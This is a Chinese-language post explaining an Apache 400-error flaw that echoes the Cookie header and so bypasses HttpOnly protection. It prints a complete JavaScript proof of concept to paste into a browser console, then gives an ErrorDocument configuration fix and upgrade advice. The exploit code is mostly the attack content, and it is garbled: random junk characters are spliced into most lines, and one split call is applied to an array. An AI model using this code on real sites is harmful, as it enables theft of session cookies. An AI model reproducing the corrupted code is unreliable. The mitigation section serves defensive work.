很多程序以及一些商业或者成熟开源的CMS文章系统,为了防止XSS盗取用户cookie,一般都会给cookie加上HttpOnly属性,禁止直接用JS读取用户的cookie,从而降低XSS的危害;而这个问题刚好可以用来绕过cookie的HttpOnly属性。
用Chrome打开一个站点,按F12打开开发者工具,切换到Console,输入如下代码并回车:
// http://www.exploit-db.com/exploits/18442/
// setCookies(good): writes ten cookies named xss0..xss9 on path "/".
// With `good` falsy, each value is a run of 819 "x" characters, so the
// Cookie header the browser attaches to the next same-origin request grows
// by roughly 10 * 819 bytes — presumably chosen to exceed the server's
// request-header size limit and provoke a 400 response (see the exploit-db
// reference above). With `good` truthy, the same ten cookies are expired
// (expiry one millisecond in the past) so the oversized header goes away.
// Defensive note: the disclosure only happens when the error page echoes
// the offending request header back; an error response that does not
// reflect request headers (see "修复方案" below) closes this channel.
! v! `- ]2 p' q0 Y; d$ efunction setCookies (good) { l. {3 c, N5 o, G* U% [& `7 G* W" g
// Construct the cookie value: a string of 819 "x" characters
var str = "";
' v" E1 R7 L! ufor (var i=0; i< 819; i++) {
" ~# m' u: v {) Fstr += "x";
$ R0 C. B4 h R: n}
( I5 R1 n( e' S4 W. N; o6 h& M// Set (or expire) cookies xss0..xss9; `i` is reused from the loop above
for (i = 0; i < 10; i++) {
& p. d/ v8 `: H+ y' [// Expire the cookie: expiry date one millisecond in the past
6 T, C; `5 A7 f: f& Oif (good) {- O6 Y( }1 p/ G- l
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
: d2 s; M. L+ |7 O}
' e1 g' a2 H$ z: T, H// Set the oversized cookie: name xss<i>, value is the 819-char string
else {
- C. ] Y# Q9 wvar cookie = "xss"+i+"="+str+";path=/";
' I4 Q8 j/ A" K* \}' w# ^3 \, V6 y6 `2 m2 R8 W+ n; y
document.cookie = cookie;& r* y w4 P1 R$ D
}
+ u, a# O( b& Z6 [}2 o# E. e- L& Y; R( i
// makeRequest(): installs the oversized cookies via setCookies(), then
// issues a same-origin GET to "/" through XMLHttpRequest and hands the
// response to parseCookies. The `xhr` variable is declared below with
// `var`, so it is hoisted and already assigned by the time the
// readystatechange handler runs.
function makeRequest() {
8 x7 b- A1 M' T6 |setCookies();
// parseCookies: readystatechange handler. It acts only on a completed
// 400 response, and pulls out the text between <pre> and </pre>, which
// the author reports is the echoed Cookie request header.
! {& F+ U4 h9 n2 z( {. cfunction parseCookies () {
* w' X J5 N6 Q8 {+ J3 Zvar cookie_dict = {};4 M; X" t1 `8 R* a
// Only react once the request is complete (readyState 4) with a 400 status
if (xhr.readyState === 4 && xhr.status === 400) {
. }6 D( ^2 o$ a; t+ u/ V/ Y- X// Strip CR/LF, then capture the <pre> body (match() returns null when there is none)
0 }* I3 X8 w" U, w. ^! b8 e* Yvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
, d! K. D. h. G+ [* j2 W) aif (content.length) {: i! d0 `% N8 A
// Drop the "Cookie: " header-name prefix from the captured group
& B! H |1 U* C" s8 w& P1 icontent = content[1].replace("Cookie: ", "");
// Remove the xss<n>=xxx... padding cookies, then split the rest on ";"
; @8 i9 {* @; F! {, qvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);0 e) c. Y& o6 S+ a4 a" b- m% t3 R
// Intended to add each name=value pair to cookie_dict
for (var i=0; i<cookies.length; i++) {
4 N. `; p( i( `1 ^# }* `0 Nvar s_c = cookies.split('=',2);
& L. Z# W1 V$ C pcookie_dict[s_c[0]] = s_c[1];
8 z) M4 w/ I1 J6 u5 \- W5 a% F}0 b8 v+ {5 j1 \' E0 B! ]
}* d& ?) k" C9 n. \
// Expire the padding cookies again so later requests are no longer oversized
setCookies(true);
// Display the parsed cookies
% @* R7 K$ b$ p x+ S6 oalert(JSON.stringify(cookie_dict));
& a9 E" j, H: m$ V3 v}
9 @% i) R2 w- m}
7 k. L- K) x9 ~; a6 K9 I1 ?$ G// Make the XHR request: a same-origin GET to "/", to which the browser attaches the cookies set above
3 e4 r4 Y( a# w @; a* Tvar xhr = new XMLHttpRequest();, X& o9 T) S3 H! [2 e
xhr.onreadystatechange = parseCookies;/ Z) U9 t3 T% k. p& I, N, ?
xhr.open("GET", "/", true); @; i! b) K& j* e. f; l
xhr.send(null);* E- O% I: |2 J6 _1 s4 ~
}
// Entry point: run the probe once when the script is pasted into the console
' } p/ D! p, z6 i% j, n% f- qmakeRequest();
你就能看见华丽丽的400错误页面里包含着cookie信息。
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download
修复方案:
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
In the event of a problem or error, Apache can be configured to do one of four things,
1. output a simple hardcoded error message 输出一个简单生硬的错误代码信息
2. output a customized message 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error 转向一个外部URL
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容。
" L! c V }$ fApache配置:
ErrorDocument 400 "security test"
当然,把Apache升级到最新版本也可以:)。
参考:http://httpd.apache.org/security/vulnerabilities_22.html
|